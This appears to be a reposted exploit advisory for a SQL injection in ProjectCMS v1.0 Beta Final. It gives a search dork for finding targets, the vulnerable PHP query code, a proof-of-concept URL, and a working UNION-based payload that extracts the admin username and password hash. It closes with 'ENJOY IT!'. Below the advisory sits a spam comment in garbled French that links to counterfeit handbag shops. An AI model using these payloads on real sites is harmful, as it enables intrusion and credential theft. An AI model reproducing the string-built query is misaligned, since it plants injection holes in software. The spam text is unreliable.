13.42.42
SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final-->

y3nh4ck3r@gmail.com

 to bugtraq
-------------------------
--------------------------------------
SQL INJECTION (SQLi) VULNERABILITY--ProjectCMS v1.0 Beta Final-->
--------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://projectcms.org/
-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip
-->DEMO: http://projectcms.org
-->CATEGORY: CMS / Portal
-->DESCRIPTION: ProjectCMS is an open source community project to create
               a simple content management system with an easy to follow install...
-->RELEASED: 2009-04-29

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Powered by ProjectCMS"
-->CATEGORY: SQL INJECTION VULNERABILITY
-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?)
-->Discovered Bug date: 2009-04-29
-->Reported Bug date: 2009-04-29
-->Fixed bug date: N/A
-->Info patch: N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-----------
VULN FILE:
-----------


       ...

       $sn=$_GET["sn"];

       if ( $sn == "" ) {

               $sn = "1";
       }

       $sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'";

       $result=mysql_query($sql,$connection) or die(mysql_error());

       ...


------------------
PROOF OF CONCEPT:
------------------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*


Return --> user and database, this last in title ;)


----------
EXPLOIT:
----------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*


Return --> username:::password (md5 hash) of admin and database (in title too).




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!
Views: 9383 | Added by: Siegh_Wahrhreit | Rating: 0.0/0
Total comments: 1
1 Le B.Bardot 4032  
0
un pressing pas comme les autres

Quand la fumée se dissipe, la réalité redevient toujours comme avant.. <a href=http://www.noor4.com/index.php?main_page=index&cPath=45_47>Sacs 2011 Mulberry</a> Allons questions de ce.
Je répondsEt si, ne vous en déplaise, ce ne sont pas les boîtes françaises qui créent de la croissance. <a href=http://www.noor4.com/index.php?main_page=index&cPath=9_11>Voyage sac Gucci</a> Londres, 26 mai, soir.
Le petit guide du bien congeler Sur le bateau, attention l'arnaque, les ma tres d'h tel ou serveurs de bar, vous proposent de vendre de l'ouzo dans des bouteilles d'eau en plastique, et arriv en France, vous vous rendez compte que c'est de l'eau, autour du goulot sur le bateau, vous sentez bien l'alcool, car il a t tremp dedans. Elle est assaisonnée avec beaucoup d'ail et de piment et d'un mélange typique de jus de citron vert, de citronnelle et de coriandre frais.
Le design de sac main hermes est tr unique, tr chic, la caract principale est classique.. <a href=http://www.noor4.com/index.php?main_page=index&cPath=33_35>Sacs à main Prada</a> Elles vont par deux, par trois, avec des sacs provisions.

Name *:
Email *:
Code *:
close